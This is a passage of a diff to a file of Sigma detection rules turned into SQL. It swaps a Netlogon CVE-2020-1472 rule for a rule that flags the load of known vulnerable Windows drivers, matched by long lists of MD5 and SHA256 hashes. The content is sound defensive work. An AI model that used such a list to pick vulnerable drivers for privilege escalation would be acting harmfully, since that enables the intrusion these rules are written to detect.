'%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE '%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE '%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' ESCAPE '\\' OR Hashes LIKE '%MD5=715572dfe6fb10b16f980bfa242f3fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a06bcd96ef0b90a1753a805b4235f28%' ESCAPE '\\' OR Hashes LIKE '%MD5=f242cffd9926c0ccf94af3bf16b6e527%' ESCAPE '\\' OR Hashes LIKE '%MD5=7ed6030f14e66e743241f2c1fa783e69%' ESCAPE '\\' OR Hashes LIKE '%MD5=0d6fef14f8e1ce5753424bd22c46b1ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=a4fda97f452b8f8705695a729f5969f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=62c18d61ed324088f963510bae43b831%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5a642329cce4df94b8dc1ba9660ae34%' ESCAPE '\\' OR Hashes LIKE '%MD5=a641e3dccba765a10718c9cb0da7879e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed07f1a8038596574184e09211dfc30f%' ESCAPE '\\' OR Hashes LIKE '%MD5=3473faea65fba5d4fbe54c0898a3c044%' ESCAPE '\\' OR Hashes LIKE '%MD5=708ac9f7b12b6ca4553fd8d0c7299296%' ESCAPE '\\' OR Hashes LIKE '%MD5=bbe4f5f8b0c0f32f384a83ae31f49a00%' ESCAPE '\\' OR Hashes LIKE '%MD5=257483d5d8b268d0d679956c7acdf02d%' ESCAPE '\\' OR Hashes LIKE '%MD5=312e31851e0fc2072dbf9a128557d6ef%' ESCAPE '\\' OR Hashes LIKE '%MD5=14eead4d42728e9340ec8399a225c124%' ESCAPE '\\' OR Hashes LIKE '%MD5=de1cc5c266140bff9d964fab87a29421%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a9dbf5107848c254381be67a4c1b1dd%' ESCAPE '\\' OR Hashes LIKE '%MD5=1dc94a6a82697c62a04e461d7a94d0b0%' ESCAPE '\\' OR Hashes LIKE '%MD5=2850608430dd089f24386f3336c84729%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d131a7462e568213b44ef69156f10a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=b8b6686324f7aa77f570bc019ec214e6%' ESCAPE '\\' OR Hashes LIKE '%MD5=22823fed979903f8dfe3b5d28537eb47%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d3a6bb423739a5e781f7eee04c9cfd%' ESCAPE '\\' OR Hashes LIKE '%MD5=0c0195c48b6b8582fa6f6373032118da%' ESCAPE '\\' OR Hashes LIKE '%MD5=5228b7a738dc90a06ae4f4a7412cb1e9%' ESCAPE '\\' OR Hashes LIKE '%MD5=62f02339fe267dc7438f603bfb5431a1%' ESCAPE '\\' OR Hashes LIKE '%MD5=22949977ce5cd96ba674b403a9c81285%' ESCAPE '\\' OR Hashes LIKE '%MD5=5ca1922ed5ee2b533b5f3dd9be20fd9a%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed08a6264c5c92099d6d1dae5e8f530%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0770094c3c64250167b55e4db850c04%' ESCAPE '\\' OR Hashes LIKE '%MD5=a6e9d6505f6d2326a8a9214667c61c67%' ESCAPE '\\' OR Hashes LIKE '%MD5=8407ddfab85ae664e507c30314090385%' ESCAPE '\\' OR Hashes LIKE '%MD5=9321a61a25c7961d9f36852ecaa86f55%' ESCAPE '\\' OR Hashes LIKE '%MD5=a711e6ab17802fabf2e69e0cd57c54cd%' ESCAPE '\\' OR Hashes LIKE '%MD5=29ccff428e5eb70ae429c3da8968e1ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=79df0eabbf2895e4e2dae15a4772868c%' ESCAPE '\\' OR Hashes LIKE '%MD5=fb7c61ef427f9b2fdff3574ee6b1819b%' ESCAPE '\\' OR Hashes LIKE '%MD5=f778489c7105a63e9e789a02412aaa5f%' ESCAPE '\\' OR Hashes LIKE '%MD5=fef9dd9ea587f8886ade43c1befbdafe%' ESCAPE '\\' OR Hashes LIKE '%MD5=43830326cd5fae66f5508e27cbec39a0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c7a57cd4bea07dadba2e2fb914379910%' ESCAPE '\\' OR Hashes LIKE '%MD5=f1e054333cc40f79cfa78e5fbf3b54c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc564bac7258e16627b9de0ce39fae25%' ESCAPE '\\' OR Hashes LIKE '%MD5=054299e09cea38df2b84e6b29348b418%' ESCAPE '\\' OR Hashes LIKE '%MD5=97221e16e7a99a00592ca278c49ffbfc%' ESCAPE '\\' OR Hashes LIKE '%MD5=8d63e1a9ff4cafee1af179c0c544365c%' ESCAPE '\\' OR Hashes LIKE '%MD5=96421b56dbda73e9b965f027a3bda7ba%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ae55080ec8aed49343e40d08370195c%' ESCAPE '\\' OR Hashes LIKE '%MD5=988dabdcf990b134b0ac1e00512c30c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=bbbc9a6cc488cfb0f6c6934b193891eb%' ESCAPE '\\' OR Hashes LIKE '%MD5=76c643ab29d497317085e5db8c799960%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9a30edef1105b8a64218f892b2e56ed%' ESCAPE '\\' OR Hashes LIKE '%MD5=7bd840ff7f15df79a9a71fec7db1243e%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cff7b947f8c3dea1d34dc791fc78cdc%' ESCAPE '\\' OR Hashes LIKE '%MD5=2c54859a67306e20bfdc8887b537de72%' ESCAPE '\\' OR Hashes LIKE '%MD5=a5f637d61719d37a5b4868c385e363c0%' ESCAPE '\\' OR Hashes LIKE '%MD5=2509a71a02296aa65a3428ddfac22180%' ESCAPE '\\' OR Hashes LIKE '%MD5=6cce5bb9c8c2a8293df2d3b1897941a2%' ESCAPE '\\' OR Hashes LIKE 